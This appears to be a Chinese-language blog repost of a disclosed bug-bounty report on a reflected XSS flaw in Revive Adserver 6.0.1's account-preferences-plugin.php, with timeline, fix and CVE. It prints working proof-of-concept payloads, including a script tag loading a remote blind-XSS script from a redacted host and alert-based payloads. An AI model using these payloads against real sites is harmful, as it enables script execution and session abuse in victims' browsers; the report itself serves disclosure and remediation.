Revive Adserver 账户偏好设置插件中的反射型XSS漏洞分析

本文详细报告了在Revive Adserver 6.0.1版本中发现的反射型跨站脚本漏洞,该漏洞位于账户偏好设置插件页面,通过未充分过滤的group参数注入并执行恶意脚本,文中包含漏洞原理、PoC示例及官方修复方案。

Revive Adserver 漏洞报告 #3399191 - account-preferences-plugin.php 中的反射型XSS

摘要

报告者 lu3ky-13 向 Revive Adserver 提交了一份报告,指出在 revive-adserver-6.0.1/www/admin/account-preferences-plugin.php 文件中存在一个反射型跨站脚本漏洞。攻击者可以通过 group 查询参数注入恶意脚本,由于输入未经过适当的输出编码或上下文感知的转义处理,导致脚本在受害者浏览器中执行。

受影响的组件 revive-adserver-6.0.1/www/admin/account-preferences-plugin.php?group=

测试实例:████…

概念验证

自定义PoC URL(通过 xss.report 测试/报告):

1
██████████%27%22%3E%3Cscript%20src=//███████%3E%3C/script%3E

替代的(内联)PoC,展示无需远程资源即可执行:

1
██████████%27%22%3E%3Cscript%3Ealert(9645)%3C/script%3E

示例“普通载荷”(在测试中产生弹窗,非破坏性):

1
'"()%26%25<zzz><ScRiPt >alert(9645)</ScRiPt>

复现步骤(安全)

  1. 访问以下构造的URL: ████%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E
  2. 观察注入的 <script>alert(1)</script> 是否被执行(出现弹窗),以确认反射型XSS漏洞。

影响

攻击者可以注入在受害者浏览器上下文中执行的脚本。这可能用于典型的XSS滥用场景,例如UI伪装、钓鱼内容持久化、会话操纵等。报告者仅测试了非破坏性的PoC,并未尝试窃取敏感信息。

时间线与处理

  • 2025年10月25日,03:23 UTClu3ky-13 提交报告。
  • 2025年10月25日,07:03 UTC:Revive Adserver 团队成员 mbeccati 将状态改为 已分类,确认了该反射型XSS漏洞。
  • 2025年10月26日,11:18 UTCmbeccati 发布了评论并附上补丁文件 h1-3399191.patch (F4934068),该补丁应能修复漏洞。漏洞根源在于 group 参数未得到充分清理。修复方案现在会丢弃输入中的意外字符,并验证其是否为有效输入(即插件组确实有可供用户显示的偏好设置)。
  • 2025年10月26日,11:22 UTCmbeccati 将严重程度从 高 (7.3) 调整为 中 (4.3),以更准确地反映反射型XSS攻击的风险。
  • 2025年10月28日,11:02 UTCmbeccati 将报告状态关闭并标记为 已解决。团队计划在下一周的周三(11月5日)进行一次安全发布,修复多个漏洞,并将申请CVE-ID并准备详细的安全公告。出于部分漏洞的风险等级考虑,团队将在细节公开前等待一段时间,以便更多用户有机会在漏洞利用代码泛滥之前进行升级。
  • 2025年10月28日,11:57 UTClu3ky-13 提供了署名信息:Ahmed Abdalkhaliq Abdulla (Lu3ky.13)。
  • 2025年10月30日,10:15 UTClu3ky-13 请求公开此报告。
  • 2025年10月31日,10:56 UTCmbeccati 将报告标题从“Reflected XSS (RXSS) in account-preferences-plugin.php — revive-adserver-6.0.1”更改为“Reflected XSS in account-preferences-plugin.php”。
  • 2025年10月31日,13:45 UTCmbeccati 更新了CVE引用为 CVE-2025-48987
  • 约13天前mbeccati 同意公开此报告,报告随后被公开。
  • 8天前lu3ky-13 发布评论,称收到通知发现有人在其系统上使用了报告中的载荷(一个盲XSS载荷),请求删除载荷并编辑报告以防止滥用。mbeccati 回复表示无法编辑报告者的摘要内容。lu3ky-13 随后表示感谢。

报告信息

  • 报告日期:2025年10月25日,03:23 UTC
  • 报告者:lu3ky-13
  • 报告对象:Revive Adserver
  • 报告ID:#3399191
  • 状态:已解决
  • 严重性:中 (4.3)
  • 公开日期:2025年11月19日,09:32 UTC
  • 漏洞类型:跨站脚本 (XSS) - 反射型
  • CVE ID:CVE-2025-48987
  • 赏金:隐藏
  • 账户详情:无
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计